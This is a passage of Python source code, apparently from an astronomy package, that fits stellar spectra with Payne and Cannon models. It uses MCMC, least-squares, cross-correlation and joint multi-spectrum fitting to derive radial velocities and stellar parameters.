step = 50.0
elif name=='RV':
step = 5
elif name=='VROT':
step = 5
elif name=='VMICRO':
step = 1.0
elif name.endswith('_H'):
step = 0.1
else:
step = 0.1
delta[i] = step
return delta
def fit_mcmc_payne(spec,model=None,fitparams=None,fixparams={},initpar=None,steps=100,
cornername=None,verbose=False):
"""
Fit the spectrum with MCMC.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
model: Payne model, optional
Payne model to use. The default is to load the Payne model
in the data/ directory and use those.
fitparams : list of labels, optional
List of Payne parameter/label names to fit. Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H','RV'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV], optional.
steps : int, optional
Number of steps to use. Default is 100.
cornername : string, optional
Output filename for the corner plot. If a corner plot is requested, then the
minimum number of steps used is 500.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_mcmc_payne(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
# Fitting parameters
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H','RV']
nfitparams = len(fitparams)
nfixparams = len(fixparams)
# Load the Payne model
#-----------------------
if model is None: model = payne.load_models()
model.prepare(spec)
# Initial estimates
if initpar is None:
initpar = make_payne_initlabels(fitparams)
# Initialize spectral fitter
sp = payne.PayneSpecFitter(spec,model,fitparams,fixparams,verbose=False)
# Calculate the bounds
bounds = sp.mkbounds(fitparams,initpar)
sp.bounds = bounds
# Set up the MCMC sampler
ndim, nwalkers = nfitparams, 20
delta = mcmc_delta_payne(fitparams)
pos = [initpar + delta*np.random.randn(ndim) for i in range(nwalkers)]
sampler = emcee.EnsembleSampler(nwalkers, ndim, emcee_lnprob_payne,
args=(spec.wave.flatten(), spec.flux.flatten(), spec.err.flatten(), sp))
if cornername is not None: steps=np.maximum(steps,500) # at least 500 steps
# Run MCMC sampler
if verbose: print('Running MCMC')
out = sampler.run_mcmc(pos, steps)
samples = sampler.chain[:, np.int(steps/2):, :].reshape((-1, ndim))
# Get the median and stddev values
pars = np.zeros(ndim,float)
parerr = np.zeros(ndim,float)
if verbose is True: print('MCMC values:')
for i in range(ndim):
t=np.percentile(samples[:,i],[16,50,84])
pars[i] = t[1]
parerr[i] = (t[2]-t[0])*0.5
if verbose is True: printpars(pars,parerr,names=fitparams)
# The maximum likelihood parameters
bestind = np.unravel_index(np.argmax(sampler.lnprobability),sampler.lnprobability.shape)
pars_ml = sampler.chain[bestind[0],bestind[1],:]
# Get best model
if nfixparams>0:
all_labels = fitparams+list(fixparams.keys())
all_pars = pars + fixparams.values()
else:
all_labels = fitparams
all_pars = pars
bestlabels = model.mklabels(dict(zip(all_labels,all_pars)))
mcmodel = model(bestlabels)
mcchisq = np.sqrt(np.sum(((spec.flux-mcmodel.flux)/spec.err)**2)/(spec.npix*spec.norder))
# Put it into the output structure
dtype = np.dtype([('pars',float,ndim),('pars_ml',float,ndim),('parerr',float,ndim),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = pars
out['pars_ml'] = pars_ml
out['parerr'] = parerr
out['chisq'] = mcchisq
# Corner plot
if cornername is not None:
matplotlib.use('Agg')
fig = corner.corner(samples, labels=fitparams, truths=pars)
plt.savefig(cornername)
plt.close(fig)
print('Corner plot saved to '+cornername)
return out,mcmodel
def fit_payne(spectrum,model=None,fitparams=None,fixparams={},verbose=False,
figfile=None,mcmc=False,cornername=None,nthreads=None,
notweak=False,tpoly=False,tpolyorder=3):
"""
Fit the spectrum. Find the best RV and stellar parameters using the Payne model.
Parameters
----------
spectrum : Spec1D object
The observed spectrum to match.
model: Payne model, optional
Payne model to use. The default is to load the Payne model
in the data/ directory and use those.
fitparams : list of labels, optional
List of Payne parameter/label names to fit. Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H','RV'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
This is False by default.
figfile : string, optional
The filename for a diagnostic plot showing the observed spectrum, model
spectrum and the best-fit parameters.
cornername : string, optional
The filename for a "corner" plot showing the posterior distributions from
the MCMC run.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
model : Spec1D object
The best-fitting Payne model spectrum (as Spec1D object).
specm : Spec1D object
The observed spectrum with discrepant and outlier pixels masked.
Example
-------
.. code-block:: python
out, model = fit_payne(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Set threads
if nthreads is not None:
os.environ["OMP_NUM_THREADS"] = str(nthreads)
os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads)
os.environ["MKL_NUM_THREADS"] = str(nthreads)
os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads)
os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads)
t0 = time.time()
# Make internal copy
spec = spectrum.copy()
# Fitting parameters
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H','RV']
else:
fitparams = [f.upper() for f in fitparams]
if verbose: print('Fitting Payne model to spectrum with parameters: '+', '.join(fitparams))
nfitparams = len(fitparams)
nfixparams = len(fixparams)
# Step 1: Prepare the spectrum
#-----------------------------
# Normalize and mask the spectrum
spec = utils.specprep(spec)
# Mask out any large positive outliers, e.g. badly subtracted sky lines
specm = utils.maskoutliers(spec,verbose=verbose)
# Step 2: Load the Payne model
#------------------------------
if model is None: model = payne.load_models()
model.prepare(specm)
# Check the input labels against the Paybe model labels
fitparams = payne.check_params(model,fitparams)
if nfixparams>0:
fixparams = payne.check_params(model,fixparams)
# Step 3: Get initial RV using cross-correlation with rough sampling of Teff/logg parameter space
#------------------------------------------------------------------------------------------------
beststr, xmodel = fit_xcorrgrid_payne(specm,model,verbose=verbose,maxvel=1000.0)
# Step 4: Least Squares fitting with forward modeling
#----------------------------------------------------
# Tweak the continuum
#specm = tweakcontinuum(specm,xmodel)
# Initial estimates
initpar = {'TEFF':beststr['teff'],'LOGG':beststr['logg'],'FE_H':beststr['feh'],
'ALPHA_H':beststr['alphafe']+beststr['feh'],'RV':beststr['vrel']}
lsout0, lsmodel0 = fit_lsq_payne(specm,model,initpar=initpar,fitparams=fitparams,
fixparams=fixparams,verbose=verbose)
lspars0 = lsout0['pars'][0]
lsperror0 = lsout0['parerr'][0]
# Tweak the continuum normalization
if notweak is False:
specm = tweakcontinuum(specm,lsmodel0,usepoly=tpoly,polyorder=tpolyorder)
# Mask out very discrepant pixels when compared to the best-fit model
specm = utils.maskdiscrepant(specm,lsmodel0,verbose=verbose)
# Refit with Payne
lsout, lsmodel = fit_lsq_payne(specm,model,initpar=dict(zip(fitparams,lspars0)),
fitparams=fitparams,fixparams=fixparams,verbose=verbose)
lspars = lsout['pars'][0]
lsperror = lsout['parerr'][0]
else:
lsout = lsout0
lsmodel = lsmodel0
lspars = lspars0
lsperror = lsperror0
# Step 5: Run fine grid in RV, forward modeling
#----------------------------------------------
maxv = 10.0
rvind, = np.where(np.char.array(fitparams)=='RV')[0]
vel = dln.scale_vector(np.arange(31),lspars[rvind]-maxv,lspars[rvind]+maxv)
chisq = np.zeros(len(vel))
tinput = dict(zip(fitparams,lsout['pars'][0].copy()))
if nfixparams>0: # add fixed parameters
tinput.update(fixparams)
for i,v in enumerate(vel):
tinput['RV'] = v
tlabels = model.mklabels(tinput)
m = model(tlabels)
chisq[i] = np.sqrt(np.sum(((specm.flux-m.flux)/specm.err)**2)/(specm.npix*specm.norder))
vel2 = dln.scale_vector(np.arange(300),lspars[rvind]-maxv,lspars[rvind]+maxv)
chisq2 = dln.interp(vel,chisq,vel2)
bestind = np.argmin(chisq2)
finerv = vel2[bestind]
finechisq = chisq2[bestind]
if verbose is True:
print('Fine grid best RV = %5.2f km/s' % finerv)
print('chisq = %5.2f' % finechisq)
# Final parameters and uncertainties (so far)
fpars = lsout['pars'][0]
fperror = lsout['parerr'][0]
fpars[rvind] = finerv
fchisq = finechisq
finput = dict(zip(fitparams,fpars.copy()))
finput['RV'] = finerv
flabels = model.mklabels(finput)
fmodel = model(flabels)
# Step 6: MCMC
#--------------
if (mcmc is True) | (cornername is not None):
mcout, mcmodel = fit_mcmc_payne(specm,model,fitparams=fitparams,fixparams=fixparams,
initpar=fpars,verbose=verbose,cornername=cornername)
# Use these parameters
fpars = mcout['pars'][0]
fperror = mcout['parerr'][0]
fchisq = mcout['chisq'][0]
fmodel = mcmodel
# Construct the output
#---------------------
vrel = fpars[rvind]
vrelerr = fperror[rvind]
bc = specm.barycorr()
vhelio = vrel + bc
if verbose is True:
print('Final parameters:')
printpars(fpars,fperror,names=fitparams)
print('Vhelio = %6.2f +/- %5.2f km/s' % (vhelio,vrelerr))
print('BC = %5.2f km/s' % bc)
print('chisq = %5.2f' % fchisq)
dtlist = [('vhelio',np.float32),('vrel',np.float32),('vrelerr',np.float32)]
for k in range(nfitparams):
name = fitparams[k].lower()
if name is not 'rv': # Skip RV
dtlist += [(name,np.float32),(name+'err',np.float32)]
dtlist += [('chisq',np.float32),('bc',np.float32)]
dtype = np.dtype(dtlist)
out = np.zeros(1,dtype=dtype)
out['vhelio'] = vhelio
out['vrel'] = vrel
out['vrelerr'] = vrelerr
for k in range(nfitparams):
name = fitparams[k].lower()
if name is not 'rv': # Skip RV
out[name] = fpars[k]
out[name+'err'] = fperror[k]
out['chisq'] = fchisq
out['bc'] = bc
# Make diagnostic figure
if figfile is not None:
# Apply continuum tweak to original spectrum as well
cratio = specm.cont/spec.cont
orig = spec.copy()
orig.flux /= cratio
orig.err /= cratio
orig.cont *= cratio
# Make the diagnostic figure
annotlabels = np.char.array(fitparams).lower()
annotlabels[rvind] = 'vrel'
specfigure(figfile,specm,fmodel,out,original=orig,verbose=verbose,ispayne=True,annotlabels=annotlabels)
# How long did this take
if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0))
return out, fmodel, specm
def multifit_lsq_payne(speclist,modlist,fitparams=None,fixparams={},initpar=None,verbose=False):
"""
Least Squares fitting with forward modeling of multiple spectra simultaneously.
Parameters
----------
speclist : Spec1D object
List of the observed spectra to match.
modlist : list of Doppler Payne models
A list of the prepared Doppler Payne models to use, one set for each observed
spectrum.
fitparams : list of labels, optional
List of Payne parameter/label names to fit (excluding RV). Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV, etc.], optional.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Payne model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = multifit_lsq_payne(speclist,modlist,initpar)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
nspec = len(speclist)
# Fitting parameters, excluding RV
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H']
# Make sure RV is excluded, that is handled separately
fitparams = np.char.array(fitparams)
fitparams = list(fitparams[np.char.array(fitparams).upper().find('RV')==-1])
nfitparams = len(fitparams)
nfixparams = len(fixparams)
# Get initial estimates
npar = nfitparams+nspec
# Initial estimates
if initpar is None:
initpar1 = make_payne_initlabels(fitparams)
initpar = np.hstack((initpar1,np.zeros(nspec,float)))
# Calculate the bounds
lbounds = np.zeros(npar,float)+1e5
ubounds = np.zeros(npar,float)-1e5
labelbounds = make_payne_bounds(fitparams,initpar[0:nfitparams])
lbounds[0:nfitparams] = labelbounds[0]
ubounds[0:nfitparams] = labelbounds[1]
lbounds[nfitparams:] = -1000
ubounds[nfitparams:] = 1000
bounds = (lbounds, ubounds)
# Initialize the fitter
spfitter = payne.PayneMultiSpecFitter(speclist,modlist,fitparams,fixparams=fixparams,verbose=verbose)
# Put all of the spectra into a large 1D array
ntotpix = 0
for s in speclist:
ntotpix += s.npix*s.norder
wave = np.zeros(ntotpix)
flux = np.zeros(ntotpix)
err = np.zeros(ntotpix)
cnt = 0
for i in range(nspec):
spec1 = speclist[i]
npx = spec1.npix*spec1.norder
wave[cnt:cnt+npx] = spec1.wave.T.flatten()
flux[cnt:cnt+npx] = spec1.flux.T.flatten()
err[cnt:cnt+npx] = spec1.err.T.flatten()
cnt += npx
# We are fitting nfitparams stellar parameters and Nspec relative RVs
lspars, lscov = curve_fit(spfitter.model, wave, flux, sigma=err, p0=initpar, bounds=bounds, jac=spfitter.jac)
# If it hits a boundary then the solution won't chance much compared to initpar
# setting absolute_sigma=True gives crazy low lsperror values
lsperror = np.sqrt(np.diag(lscov))
if verbose is True:
print('Least Squares labels and RVs:')
parnames = fitparams.copy()+list('RV'+np.char.array((np.arange(nspec)+1).astype(str)))
printpars(lspars,lsperror,names=parnames)
lsmodel = spfitter.model(wave,*lspars)
lschisq = np.sqrt(np.sum(((flux-lsmodel)/err)**2)/len(lsmodel))
if verbose is True: print('chisq = %5.2f' % lschisq)
# Put it into the output structure
dtype = np.dtype([('pars',float,npar),('parerr',float,npar),('parcov',float,(npar,npar)),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = lspars
out['parerr'] = lsperror
out['parcov'] = lscov
out['chisq'] = lschisq
return out, lsmodel
def jointfit_payne(speclist,model=None,fitparams=None,fixparams={},mcmc=False,snrcut=10.0,
saveplot=False,verbose=False,outdir=None,nthreads=None,
notweak=False,tpoly=False,tpolyorder=3):
"""
This fits a Payne model to multiple spectra of the same star.
Parameters
----------
speclist : Spec1D object
The observed spectrum to match.
model : Payne model, optional
Payne model to use. The default is to load the Payne model
in the data/ directory and use those.
fitparams : list of labels, optional
List of Payne parameter/label names to fit (excluding RV). Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
This is only run the individual spectra are being fit.
This is False by default.
snrcut : int, optional
S/N cut to fit individual spectra in the first step. The default is snrcut=10.
saveplot : bool, optional
Save output plots.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
outdir : str, optional
The directory for output files. The default is to use the current directory.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
sumstr : numpy structured array
Summary catalog of final best-fit values.
final :
Final best-fit values for each individual spectrum.
bmodel : List of Spec1D object
List of best-fitting model spectra.
specmlist : list of Spec1D object
List of the observed spectrua with discrepant and outlier pixels masked.
Example
-------
.. code-block:: python
sumstr, final, bmodel, specmlist = jointfit_payne(speclist)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
nspec = len(speclist)
t0 = time.time()
# Set threads
if nthreads is not None:
os.environ["OMP_NUM_THREADS"] = str(nthreads)
os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads)
os.environ["MKL_NUM_THREADS"] = str(nthreads)
os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads)
os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads)
# If list of filenames input, then load them
# Load the Payne model
#---------------------
if model is None: model = payne.load_models()
# Fitting parameters, excluding RV
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H']
if verbose: print('Fitting: '+', '.join(fitparams))
# Make sure RV is excluded, that is handled separately
fitparams = np.char.array(fitparams)
fitparams = list(fitparams[np.char.array(fitparams).upper().find('RV')==-1])
nfitparams = len(fitparams)
nfixparams = len(fixparams)
if verbose: print('Jointly fitting Payne model to '+str(nspec)+' spectra with parameters: '+
', '.join(fitparams)+' and RV for each spectrum')
# Creating catalog of info on each spectrum
dtlist = [('filename',np.str,300),('snr',float),('vhelio',float),('vrel',float),('vrelerr',float)]
for k in range(nfitparams):
name = fitparams[k].lower()
dtlist += [(name,np.float32),(name+'err',np.float32)]
dtlist += [('chisq',float),('bc',float)]
dt = np.dtype(dtlist)
info = np.zeros(nspec,dtype=dt)
for n in dt.names: info[n] = np.nan
for i,s in enumerate(speclist):
info['filename'][i] = s.filename
info['snr'][i] = s.snr
# Make sure some spectra pass the S/N cut
hisnr, nhisnr = dln.where(info['snr']>snrcut)
if nhisnr < np.ceil(0.25*nspec):
snr = np.flip(np.sort(info['snr']))
snrcut = snr[np.maximum(np.int(np.ceil(0.25*nspec)),np.minimum(4,nspec-1))]
if verbose is True:
print('Lowering S/N cut to %5.1f so at least 25%% of the spectra pass the cut' % snrcut)
# Step 1) Loop through each spectrum and run fit()
if verbose is True: print('Step #1: Fitting the individual spectra')
specmlist = []
modlist = []
for i in range(len(speclist)):
spec = speclist[i].copy()
if verbose is True:
print('Fitting spectrum '+str(i+1))
print(speclist[i].filename)
# Only do this for spectra with S/N>10 or 15
if spec.snr>snrcut:
# Save the plot, figure the output figure filename
figfile = None
if saveplot is True:
fdir, base, ext = utils.splitfilename(speclist[i].filename)
figfile = base+'_dopfit.png'
if outdir is not None: figfile = outdir+'/'+figfile
if (outdir is None) & (fdir != ''): figfile = fdir+'/'+figfile
# Fit the spectrum
fitparams1 = fitparams+['RV'] # make sure to fit the RV
out, bmodel, specm = fit_payne(spec,fitparams=fitparams1,fixparams=fixparams,
verbose=verbose,mcmc=mcmc,figfile=figfile,
notweak=notweak,tpoly=tpoly,tpolyorder=tpolyorder)
# Save the "prepared" DopplerPayneModel object, but don't
# copy the original data (~200MB).
pmodel = model.copy() # points to original data
pmodel.prepare(specm) # Now prepare the model
modlist.append(pmodel)
specmlist.append(specm.copy())
info['vhelio'][i] = out['vhelio']
info['vrel'][i] = out['vrel']
info['vrelerr'][i] = out['vrelerr']
for k in range(nfitparams):
name = fitparams[k].lower()
info[name][i] = out[name]
info[name+'err'][i] = out[name+'err']
info['chisq'][i] = out['chisq']
info['bc'][i] = out['bc']
else:
if verbose is True:
print('Skipping: S/N=%6.1f below threshold of %6.1f. Loading spectrum and preparing models.' % (spec.snr,snrcut))
# Just get the spectrum
sp = speclist[i].copy()
sp = utils.specprep(sp) # mask and normalize
# Mask outliers
sp = utils.maskoutliers(sp)
specmlist.append(sp)
# Save the "prepared" DopplerPayneModel object, but don't
# copy the original data (~200MB).
pmodel = model.copy() # points to original data
pmodel.prepare(sp) # Now prepare the model
modlist.append(pmodel)
specmlist.append(specm.copy())
# at least need BC
info['bc'][i] = speclist[i].barycorr()
if verbose is True: print(' ')
# Step 2) Find weighted mean labels
if verbose is True: print('Step #2: Getting weighted mean labels')
gd, ngd = dln.where(np.isfinite(info['chisq']))
if ngd>0:
pars = list(np.char.array(fitparams).lower())+['vhelio']
parerr = list(np.char.array(fitparams).lower()+'err')+['vrelerr']
wtpars = np.zeros(len(pars),float)
for i in range(len(pars)):
p = info[pars[i]][gd]
perr = info[parerr[i]][gd]
gdp,ngdp,bdp,nbdp = dln.where(perr > 0.0,comp=True)
# Weighted by 1/perr^2
if ngdp>0:
if (nbdp>0): perr[bdp] = np.max(perr[gdp])*2
mnp = dln.wtmean(p,perr)
wtpars[i] = mnp
# Unweighted
else:
wtpars[i] = np.mean(p)
if verbose is True:
print('Initial weighted parameters are:')
printpars(wtpars,names=np.char.array(pars).upper())
else:
wtpars = np.zeros(nfitparams+1,float)
wtpars = make_payne_initlabels(fitparams+['RV'])
if verbose is True:
print('No good fits. Using these as intial guesses:')
printpars(wtpars)
# Make initial guesses for all the parameters, nfitparams labels and Nspec relative RVs
initpar1 = np.zeros(nfitparams+nspec,float)
initpar1[0:nfitparams] = wtpars[0:nfitparams]
# the default is to use mean vhelio + BC for all visit spectra
initpar1[nfitparams:] = wtpars[nfitparams]-info['bc'] # vhelio = vrel + BC
# Use the Vrel values from the initial fitting if they are accurate enough
gdinit,ngdinit = dln.where(np.isfinite(info['vrel']) & (info['snr']>5))
if ngdinit>0:
initpar1[nfitparams+gdinit] = info['vrel'][gdinit]
# Step 3) Refit all spectra simultaneous fitting stellar parameters and RVs
if verbose is True:
print(' ')
print('Step #3: Fitting all spectra simultaneously')
out1, fmodels1 = multifit_lsq_payne(specmlist,modlist,fitparams=fitparams,
fixparams=fixparams,initpar=initpar1)
stelpars1 = out1['pars'][0,0:nfitparams]
stelparerr1 = out1['parerr'][0,0:nfitparams]
vrel1 = out1['pars'][0,nfitparams:]
vrelerr1 = out1['parerr'][0,nfitparams:]
vhelio1 = vrel1+info['bc']
medvhelio1 = np.median(vhelio1)
vscatter1 = dln.mad(vhelio1)
verr1 = vscatter1/np.sqrt(nspec)
if verbose is True:
print('Parameters:')
printpars(stelpars1,names=fitparams)
print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio1,verr1))
print('Vscatter = %6.3f km/s' % vscatter1)
print('Vhelio values = ',vhelio1)
# Step 4) Tweak continua and remove outlies
if verbose is True:
print(' ')
print('Step #4: Tweaking continuum and masking outliers')
if notweak is False:
for i,spm in enumerate(specmlist):
# Create parameter list that includes RV at the end
params1 = list(stelpars1)+[vrel1[i]]
paramnames1 = fitparams+['RV']
parinput1 = dict(zip(paramnames1,params1))
model1 = modlist[i]
labels1 = model1.mklabels(parinput1)
bestm = model1(labels1)
# Tweak the continuum normalization
spm = tweakcontinuum(spm,bestm,usepoly=tpoly,polyorder=tpolyorder)
# Mask out very discrepant pixels when compared to the best-fit model
spm = utils.maskdiscrepant(spm,bestm,verbose=verbose)
specmlist[i] = spm.copy()
else:
if verbose: print('Skipping tweaking')
# Step 5) refit all spectra simultaneous fitting stellar parameters and RVs
if verbose is True:
print(' ')
print('Step #5: Re-fitting all spectra simultaneously')
# Initial guesses for all the parameters, nfitparams stellar parameters and Nspec relative RVs
initpar2 = out1['pars'][0]
out2, fmodels2 = multifit_lsq_payne(specmlist,modlist,fitparams=fitparams,
fixparams=fixparams,initpar=initpar2)
stelpars2 = out2['pars'][0,0:nfitparams]
stelparerr2 = out2['parerr'][0,0:nfitparams]
vrel2 = out2['pars'][0,nfitparams:]
vrelerr2 = out2['parerr'][0,nfitparams:]
vhelio2 = vrel2+info['bc']
medvhelio2 = np.median(vhelio2)
vscatter2 = dln.mad(vhelio2)
verr2 = vscatter2/np.sqrt(nspec)
if verbose is True:
print('Final parameters:')
printpars(stelpars2,names=fitparams)
print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio2,verr2))
print('Vscatter = %6.3f km/s' % vscatter2)
print('Vhelio values = ',vhelio2)
# Final output structure, one element per spectrum
final = info.copy()
for k in range(nfitparams):
name = fitparams[k].lower()
info[name] = stelpars2[k]
info[name+'err'] = stelparerr2[k]
final['vrel'] = vrel2
final['vrelerr'] = vrelerr2
final['vhelio'] = vhelio2
bmodel = []
totchisq = 0.0
totnpix = 0
for i in range(nspec):
# Create parameter list that includes RV at the end
params1 = list(stelpars2)+[vrel2[i]]
paramnames1 = fitparams+['RV']
parinput1 = dict(zip(paramnames1,params1))
model1 = modlist[i]
labels1 = model1.mklabels(parinput1)
m = model1(labels1)
sp1 = specmlist[i]
chisq = np.sqrt(np.sum(((sp1.flux-m.flux)/sp1.err)**2)/(sp1.npix*sp1.norder))
totchisq += np.sum(((sp1.flux-m.flux)/sp1.err)**2)
totnpix += sp1.npix*sp1.norder
final['chisq'][i] = chisq
bmodel.append(m)
totchisq = np.sqrt(totchisq/totnpix)
# Average values
sumdtlist = [('medsnr',float),('totsnr',float),('vhelio',float),('vscatter',float),('verr',float)]
for k in range(nfitparams):
name = fitparams[k].lower()
sumdtlist += [(name,np.float32),(name+'err',np.float32)]
sumdtlist += [('chisq',float)]
sumdt = np.dtype(sumdtlist)
sumstr = np.zeros(1,dtype=sumdt)
sumstr['medsnr'] = np.median(info['snr'])
sumstr['totsnr'] = np.sqrt(np.sum(info['snr']**2))
sumstr['vhelio'] = medvhelio2
sumstr['vscatter'] = vscatter2
sumstr['verr'] = verr2
for k in range(nfitparams):
name = fitparams[k].lower()
sumstr[name] = stelpars2[k]
sumstr[name+'err'] = stelparerr2[k]
sumstr['chisq'] = totchisq
# Save the best-fitting plots
if saveplot is True:
if verbose is True:
print('')
print('Making best-fit plots for each spectrum')
pdfnames = []
specfiles = [s.filename for s in speclist]
for i,f in enumerate(specfiles):
# Figure the output figure filename
fdir,base,ext = utils.splitfilename(speclist[i].filename)
figname = base+'_dopjointfit.png'
if outdir is not None: figname = outdir+'/'+figname
if (outdir is None) & (fdir != ''): figname = fdir+'/'+figname
# Make the plot
spec = speclist[i]
specm = specmlist[i]
fmodel = bmodel[i]
fout = final[i]
# Apply continuum tweak to original spectrum as well
orig = spec.copy()
if orig.normalized is False: orig.normalize()
cratio = specm.cont/orig.cont
orig.flux /= cratio
orig.err /= cratio
orig.cont *= cratio
annotlabels = np.char.array(fitparams+['RV']).lower()
annotlabels[-1] = 'vrel'
specfigure(figname,specm,fmodel,fout,original=orig,verbose=True,
ispayne=True,annotlabels=annotlabels)
# Make a PDF version that we will combine at the end
fignamepdf = figname.replace('.png','.pdf')
specfigure(fignamepdf,specm,fmodel,fout,original=orig,verbose=False,
ispayne=True,annotlabels=annotlabels)
pdfnames.append(fignamepdf)
# Combine the PDFs into one
fdir,base,ext = utils.splitfilename(specfiles[0])
combname = base+'_dopjointfit_comb.pdf' # png
if outdir is not None: combname = outdir+'/'+combname
if (outdir is None) & (fdir != ''): combname = fdir+'/'+combname
if os.path.exists(combname): os.remove(combname)
cmd = ['gs','-dBATCH','-dNOPAUSE','-q','-sDEVICE=pdfwrite','-sOutputFile='+combname]
cmd = cmd+pdfnames
try:
out = subprocess.call(cmd,stderr=subprocess.STDOUT,shell=False)
if verbose: print('Combined plots saved to '+combname)
except subprocess.CalledProcessError:
raise Exception("Could not combine PDFs with ghostscript")
# Delete individual PDFs
for fp in pdfnames: os.remove(fp)
# How long did this take
if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0))
return sumstr, final, bmodel, specmlist
######################### CANNON PROGRAMS ###########################
def emcee_lnlike_cannon(theta, x, y, yerr, models, spec):
"""
This helper function calculates the log likelihood for the MCMC portion of fit().
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv].
x : array
Array of x-values for y. Not really used.
y : array
Observed flux array.
yerr : array
Uncertainties in the observed flux.
models : list of Cannon models
List of Cannon models to use
spec : Spec1D
The observed spectrum. Needed to run cannon.model_spectrum().
Outputs
-------
lnlike : float
The log likelihood value.
"""
#m = cannon.model_spectrum(models,spec,teff=theta[0],logg=theta[1],feh=theta[2],rv=theta[3])
m = models(teff=theta[0],logg=theta[1],feh=theta[2],rv=theta[3])
inv_sigma2 = 1.0/yerr**2
return -0.5*(np.sum((y-m.flux.flatten())**2*inv_sigma2))
def emcee_lnprior_cannon(theta, models):
"""
This helper function calculates the log prior for the MCMC portion of fit().
It's a flat/uniform prior across the stellar parameter space covered by the
Cannon models.
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv].
models : list of Cannon models
List of Cannon models to use
Outputs
-------
lnprior : float
The log prior value.
"""
for m in models:
inside = True
for i in range(3):
inside &= (theta[i]>=m.ranges[i,0]) & (theta[i]<=m.ranges[i,1])
inside &= (np.abs(theta[3]) <= 1000)
if inside:
return 0.0
return -np.inf
def emcee_lnprob_cannon(theta, x, y, yerr, models, spec):
"""
This helper function calculates the log probability for the MCMC portion of fit().
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv].
x : array
Array of x-values for y. Not really used.
y : array
Observed flux array.
yerr : array
Uncertainties in the observed flux.
models : list of Cannon models
List of Cannon models to use
spec : Spec1D
The observed spectrum. Needed to run cannon.model_spectrum().
Outputs
-------
lnprob : float
The log probability value, which is the sum of the log prior and the
log likelihood.
"""
lp = emcee_lnprior_cannon(theta,models)
if not np.isfinite(lp):
return -np.inf
return lp + emcee_lnlike_cannon(theta, x, y, yerr, models, spec)
def fit_xcorrgrid_cannon(spec,models=None,samples=None,verbose=False,maxvel=1000.0):
"""
Fit spectrum using cross-correlation with models sampled in the parameter space.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
samples : numpy structured array, optional
Catalog of teff/logg/feh parameters to use when sampling the parameter space.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
maxvel : float, optional
The maximum velocity to probe in the cross-correlation. The default is 1000 km/s.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_xcorrgrid_cannon(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Check that the samples input has the right columns
if samples is not None:
for n in ['teff','logg','feh']:
try:
dum = samples[n]
except:
raise ValueError(n+' not found in input SAMPLES')
# Step 1: Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
spec = utils.specprep(spec)
